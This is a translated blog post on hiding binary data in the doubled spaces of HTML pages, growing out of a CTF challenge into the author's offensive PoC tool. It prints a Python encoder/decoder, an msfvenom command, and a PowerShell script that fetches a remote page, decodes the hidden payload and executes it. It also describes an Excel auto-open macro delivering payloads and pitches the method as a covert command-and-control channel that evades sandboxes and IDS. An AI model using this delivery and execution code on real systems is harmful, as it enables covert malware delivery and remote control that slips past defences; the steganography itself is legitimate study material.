
HTML Whitespace Steganography & Binary Exploit Delivery w/ PowerShell over HTML [PoC]

Posted: 2024/3/12, category HTML, by 豆豆


Practical Steganography

A few years ago I came across a very academic challenge: a ZIP file containing a particular HTML page, and the aim was to obtain the usual FLAG.

The web page didn't have any "juicy clue": no script, no image, nothing else. The only strange things were its size (a few MB) and the fact that the source was all on one line.

What made me suspicious was the content: an extract from a Wikipedia page, repeated many times over. So I looked for differences between one repetition and the next; from the browser I could not find any, so I checked the source directly. There I found that the repetitions were not identical up to a certain point, after which the code simply repeated itself verbatim.

Analysing the differences in the HTML source, the only thing that emerged was double spaces between words, arranged in an apparently random way.

I don't even remember how I got there, but searching the Internet I found some papers by undergraduates (Indian, I think) describing the theory of "inter-word" whitespace steganography (something like SNOW, plus an interesting vector). Applying their approach in my own custom scripts, I managed to recover binary files hidden in the duplicated spaces of the page.

The files were images, which contained other images, compressed files, their passwords and finally the FLAG hidden in a digital audio file. That was the challenge, and the end of it.

The Concept

As you can see, I mentioned SNOW (SNOW exploits the Steganographic Nature Of Whitespace).

What SNOW does is append whitespace (spaces and tabs) at the end of each line of an ASCII file, encoding binary data there and optionally compressing and encrypting it (SNOW uses the ICE cipher). The advantage, and at the same time the limitation, of this approach is that capacity scales with the number of lines available: every line can carry a few bits, so a long text file holds a lot and a one-line file almost nothing. The real disadvantage is that any text editor can highlight suspicious trailing spaces and tabs, and that the information is lost as soon as the file goes through a parser or formatter that trims line endings.

Inter-word whitespace steganography, applied to web pages, lets us insert any kind of binary data between one word and the next in a way that is invisible in the browser and hard to spot even when reading the source: unless you know it is there you will hardly notice it, because an extra space between two tags or words looks like nothing more than sloppy markup.

The other positive side is that there is no data loss: both static and dynamic HTML pages are transmitted to the client as they are, and interpreting the whitespace is entirely the browser's job. That holds only as long as nothing on the path rewrites whitespace; a minifier, a templating engine, a CMS editor that reformats HTML, or a proxy that normalises the response body will silently erase the channel.

Of course there are limitations: capacity is bounded by the length of the "container" page, since each inter-word gap carries exactly one bit (a page with 8,000 gaps holds about 1,000 bytes). The data can be compressed, though, and if the payload is a command or a small binary rather than bulk information you do not need much room.

How does it work

Long story short: single and double spaces are alternated, in a scheme loosely reminiscent of Manchester encoding (strictly it is simpler than that: one bit per gap, with no clock transitions).

[Figure: Manchester binary data transmission]

So:

  • one space == 0
  • two spaces == 1

This works because a browser collapses consecutive whitespace and renders a double space as a single one, and spaces between tags are invisible to the reader anyway. The exceptions are the places where whitespace is significant, such as pre and textarea elements or anything styled with white-space: pre: there the doubled spaces would show, so those regions cannot be used as carrier.

The file "pippo.html":

<b>Pippo</b> (<i>Goofy</i>, in precedenza <i>Dippy Dawg</i> e <i>Dippy the Goof</i><sup id="cite_ref-:0_1-0" class="reference"><a href="#cite_note-:0-1">[1]</a></sup>) è un <a href="/wiki/Personaggio_immaginario" title="Personaggio immaginario">personaggio immaginario</a> dei <a href="/wiki/Cartone_animato" title="Cartone animato">cartoni animati</a> e dei <a href="/wiki/Fumetti" class="mw-redirect" title="Fumetti">fumetti</a> della <a href="/wiki/Disney" class="mw-redirect" title="Disney">Disney</a>, ideato nel 1932 da <a href="/wiki/Pinto_Colvig" title="Pinto Colvig">Pinto Colvig</a> e dall’animatore Johnny Cannon come comprimario di <a href="/wiki/Topolino" title="Topolino">Topolino</a> in un <a href="/wiki/Cortometraggio" title="Cortometraggio">cortometraggio</a>, ma viene caratterizzato definitivamente dall’animatore <a href="/wiki/Art_Babbitt" title="Art Babbitt">Art Babbitt</a> nel 1935<sup id="cite_ref-:0_1-1" class="reference"><a href="#cite_note-:0-1">[1]</a></sup> e successivamente esordisce nei fumetti realizzati da <a href="/wiki/Floyd_Gottfredson" title="Floyd Gottfredson">Floyd Gottfredson</a> che definisce ulteriormente il personaggio dandogli spessore come spalla di Topolino<sup id="cite_ref-:0_1-2" class="reference"><a href="#cite_note-:0-1">[1]</a></sup>. è apparso in centinaia di cartoni animati come protagonista o comprimario<sup id="cite_ref-:2_2-0" class="reference"><a href="#cite_note-:2-2">[2]</a></sup> e in migliaia di albi a fumetti realizzati in vari paesi del mondo<sup id="cite_ref-3" class="reference"><a href="#cite_note-3">[3]</a></sup>.

…is exactly the same (has the same output) as "pipponinja.html", in which some of the inter-word gaps have been widened to two spaces (if the listing below looks identical to the one above, whitespace normalisation somewhere along the way has already collapsed the doubled spaces, which is precisely what makes the channel invisible):

<b>Pippo</b> (<i>Goofy</i>, in precedenza <i>Dippy Dawg</i> e <i>Dippy the Goof</i><sup id="cite_ref-:0_1-0" class="reference"><a href="#cite_note-:0-1">[1]</a></sup>) è un <a href="/wiki/Personaggio_immaginario" title="Personaggio immaginario">personaggio immaginario</a> dei <a href="/wiki/Cartone_animato" title="Cartone animato">cartoni animati</a> e dei <a href="/wiki/Fumetti" class="mw-redirect" title="Fumetti">fumetti</a> della <a href="/wiki/Disney" class="mw-redirect" title="Disney">Disney</a>, ideato nel 1932 da <a href="/wiki/Pinto_Colvig" title="Pinto Colvig">Pinto Colvig</a> e dall’animatore Johnny Cannon come comprimario di <a href="/wiki/Topolino" title="Topolino">Topolino</a> in un <a href="/wiki/Cortometraggio" title="Cortometraggio">cortometraggio</a>, ma viene caratterizzato definitivamente dall’animatore <a href="/wiki/Art_Babbitt" title="Art Babbitt">Art Babbitt</a> nel 1935<sup id="cite_ref-:0_1-1" class="reference"><a href="#cite_note-:0-1">[1]</a></sup> e successivamente esordisce nei fumetti realizzati da <a href="/wiki/Floyd_Gottfredson" title="Floyd Gottfredson">Floyd Gottfredson</a> che definisce ulteriormente il personaggio dandogli spessore come spalla di Topolino<sup id="cite_ref-:0_1-2" class="reference"><a href="#cite_note-:0-1">[1]</a></sup>. è apparso in centinaia di cartoni animati come protagonista o comprimario<sup id="cite_ref-:2_2-0" class="reference"><a href="#cite_note-:2-2">[2]</a></sup> e in migliaia di albi a fumetti realizzati in vari paesi del mondo<sup id="cite_ref-3" class="reference"><a href="#cite_note-3">[3]</a></sup>.
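The whole scheme in code, as an added example: this is not the html-ninja source. html-ninja frames the payload it executes with a '|' terminator (see its help below); this example instead prefixes a 4-byte length so the decoder knows where the payload stops, and it reuses html-ninja's zlib option. The cover text is constructed here from a trimmed copy of the Pippo excerpt above, repeated; the capacity function is the equivalent of html-ninja's --check.

```python
"""Inter-word whitespace steganography over HTML: one space between tokens is
bit 0, two spaces is bit 1.  Added example, not the html-ninja code itself."""
import re
import struct
import zlib

SPACE_RUN = re.compile(r" +")   # every maximal run of ASCII spaces is one "gap" = one bit
HEADER_LEN = 4                  # this example's framing: big-endian payload length (assumption)

# Constructed cover: the Pippo excerpt trimmed, 13 inter-word gaps per sentence.
SENTENCE = ('<b>Pippo</b> (<i>Goofy</i>) è un <a href="/wiki/Topolino">personaggio '
            'immaginario</a> dei cartoni animati Disney, ideato nel 1932.')


def make_cover(n: int) -> str:
    """Repeat the sentence n times, the way the CTF page repeated its Wikipedia extract."""
    return "<p>" + " ".join([SENTENCE] * n) + "</p>"


def capacity_bytes(cover: str) -> int:
    """Payload bytes a cover can carry: one bit per gap, minus the length header."""
    return max(0, len(SPACE_RUN.findall(cover)) // 8 - HEADER_LEN)


def embed(cover: str, payload: bytes, compress: bool = False) -> str:
    """Rewrite the cover's gaps so that gap i carries bit i of (header + payload)."""
    data = zlib.compress(payload) if compress else payload        # html-ninja's -ez
    frame = struct.pack(">I", len(data)) + data
    bits = "".join(f"{b:08b}" for b in frame)
    gaps = SPACE_RUN.findall(cover)
    if len(bits) > len(gaps):
        raise ValueError(f"cover has {len(gaps)} gaps, payload needs {len(bits)}")
    it = iter(bits)
    # Gaps left over after the frame stay single spaces (bit 0); the decoder stops at the header length.
    return SPACE_RUN.sub(lambda m: "  " if next(it, "0") == "1" else " ", cover)


def extract(stego: str, compress: bool = False) -> bytes:
    """Read one bit per gap (two or more spaces -> 1), regroup into bytes, honour the length header."""
    bits = "".join("1" if len(g) >= 2 else "0" for g in SPACE_RUN.findall(stego))
    blob = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits) - 7, 8))
    (n,) = struct.unpack(">I", blob[:HEADER_LEN])
    data = blob[HEADER_LEN:HEADER_LEN + n]
    if len(data) != n:
        raise ValueError("truncated payload")
    return zlib.decompress(data) if compress else data


def rendered_text(html: str) -> str:
    """Roughly what a browser shows outside <pre>: tags dropped, whitespace runs collapsed."""
    return re.sub(r"\s+", " ", re.sub(r"<[^>]+>", "", html)).strip()


if __name__ == "__main__":
    cover = make_cover(40)
    print("capacity:", capacity_bytes(cover), "bytes")
    stego = embed(cover, b"iex calc.exe")
    print("round trip:", extract(stego))
    print("renders identically:", rendered_text(stego) == rendered_text(cover))
```

Spaces inside attribute values (the real excerpt has title="Personaggio immaginario"), inside pre blocks or in scripts are counted as gaps here as well, which matches the PowerShell decoder further down that simply walks every character; a more careful encoder would skip those regions so that a doubled space never lands inside an href or a preformatted block.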

In practice

After banging my head against that cursed file, I thought of writing a PoC for the reverse operation and trying to "weaponize" a possible payload.

Why do I say "weaponize"? Because I challenge any proxy, WAF or AV to analyse and flag every single space, carrying a possibly compressed or password-protected payload, inside each page served in clear on a legitimate HTTP(S) port. (An inline device only sees the HTML at all if it terminates TLS; otherwise the page is just another HTTPS response.)

[Honestly, it is just great fun to put an MSF payload into an HTML file and make it "executable".]

That is how HTML-Ninja was born, for lack of a better name.

The tool, rough and incomplete, is a PoC written mainly in Python (with JavaScript and VBA variants) that lets you insert, extract and execute payloads within HTML files. Other features have been added since, but it is still a spare-time project that has had little feedback.

Help excerpt:

html-ninja.py -e source content outfile -> will encode the payload file 'content' into file 'source' and output the result as 'outfile'
html-ninja.py -d source outfile -> will try to decrypt white spaces in 'source' file into 'outfile'
html-ninja.py --check filename -> will check 'filename' for available spaces and spaces needed to embed the file
html-ninja.py -d http://localhost/html-ninja.html stdout -> will get http url and output to stdout
html-ninja.py -d http://localhost/html-ninja.html exec -> will get http url and execute the hex payload (payload must have a '|' terminator)
html-ninja.py -ez / -dz ... -> adds zlib compression to both encryption and decryption
html-ninja.py -eb / -db ... -> adds bz2 compression to both encryption and decryption

Examples on GitHub include:

html-ninja.js & html-ninja.html

JavaScript version and a sample HTML page showing a "self-decrypting" page.

macro_poc.bas & htm

VBA version for automatic execution of payloads via Excel.

buf.txt

Example of an MSF payload:

msfvenom -p linux/x64/exec CMD="whoami;id;uname -a" -f python -o buf.txt

…and a few others…

Demonstration

Let's take our buf.txt payload and hide it, zlib-compressed, in pippo.html: per the help excerpt above that is the -ez mode, with pippo.html as source, buf.txt as content and pipporun.html as the output file.

Now let's "read" the content of pipporun.html back with the matching -dz mode.

Binary Exploit Delivery w/ PowerShell over HTML [PoC]

Static HTML file gets downloaded -> HTML hides binary data -> HTML gets "executed"

Harmless static HTML page with embedded binary payload: https://ephreet.github.io/html-ninja/

It could embed an msfvenom meterpreter or any other file, but for the sake of the PoC we go with the usual "calc.exe".

Proof of Concept run (payload = "iex calc.exe"):

$CnC = "https://ephreet.github.io/html-ninja/"
$pch = "nil"; $b = ""; $ch = ""
# Fetch the cover page and walk it character by character: a space followed by a
# second space yields bit 1, a space followed by anything else yields bit 0.
foreach ($cu in (Invoke-WebRequest $CnC -UserAgent "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0").ToString().ToCharArray()) {
    $ch = $cu
    if ($pch -eq " ") {
        if ($ch -eq " ") { $b = $b + "1"; $ch = "nil" } else { $b = $b + "0"; $ch = "nil" }
    }
    $pch = $ch
}
# Regroup the bit string into 8-bit chunks, turn each into a character, then run "<cmd> <arg>"
$c = ""
($b -split '(\w{8})' | ? { $_ }) | ForEach-Object { $c = $c + [convert]::ToChar([System.Convert]::ToByte($_, 2)) }
$p = $c.Split(" "); & $p[0] $p[1]

Source: https://github.com/ephreet/html-ninja/

SANDBOX [ANY.RUN]

Let's see what a sandbox sees of the payload embedded via the Excel macro.

Sandbox used: any.run

Payload: cmd.exe

The Excel file contains an auto-open macro that fetches the payload over HTTP and executes its content using the algorithm. I expect the abnormal behaviour of the script and the download to be detected, but this is a simulation imagining a service that is already running on the host.

The Excel file is opened and the payload executed, so it works. Obviously the sandbox realises something is wrong, because the document contacted a website and a command was executed.

Analysing the HTTP request, all you can see is harmless HTML source:

The page is also saved locally in this example, although that is not required; even so it does not raise much of an alarm:

Let's check on VirusTotal anyway:

These are the suspicious indicators: it is clearly unusual for Excel to make HTTP requests, but there is no alert from IPS or IDS:

To be clear, normally there would be evidence like this, namely the Suricata rules firing:

Okay, the sandbox notices (of course), and the URL is quite obvious. Even static analysis of the sample would have let us trace the behaviour.

But what if, instead of delivering the payload, I had installed a service? What if it were a browser plugin? In short, if I could sidestep the sandbox and the connections went to http://random.foo/info.htm (made up!), could detection rely on domain reputation alone?

Conclusions

Okay, it's a PoC. Yes, a payload must still be delivered before it can be executed. And yes, a sandbox will still notice what is being done.

But imagine a more targeted version, perhaps with an offset from which to read the steganographed part of an HTML page, and a service running on your PC that makes web requests to absolutely harmless pages that we control.

Wouldn't that be a Command and Control hidden in plain sight? After the sandbox, would an IPS/IDS be able to intercept it?

Meanwhile, I certainly had a lot of fun opening a reverse shell by "running" an HTML file.

Translated from: https://medium.com/swlh/html-whitespace-steganography-binary-exploit-delivery-w-powershell-over-html-poc-68fc286c581d
